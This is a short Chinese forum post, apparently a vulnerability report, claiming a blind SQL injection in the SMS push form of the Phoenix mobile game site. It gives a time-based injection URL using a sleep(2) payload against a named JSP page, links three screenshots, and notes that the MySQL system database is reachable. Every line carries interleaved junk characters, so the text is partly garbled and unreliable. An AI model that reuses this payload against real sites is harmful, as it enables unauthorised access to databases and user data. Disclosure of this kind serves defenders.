简要描述:* d: v7 E) `' G( K0 x6 J- h0 P
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
' @! J0 s# b+ q0 p
3 E: _5 b# n, u5 z3 M% {详细说明:
& u& \7 {$ V4 U9 ?$ Y0 `$ Z2 a存在SQL盲注url:
- l0 e4 [& V3 r5 s& c5 ifenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
4 ~: d7 ~; U, f. s! ~* shttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png; C) Q. { o! u/ Q8 ?" A8 U% B8 H* ~
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
$ S, Z3 `$ @; E% e. dhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg( V8 C, J9 c! ?5 J
7 i s/ K6 h9 Y' r9 \1 I# Y* _0 a
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对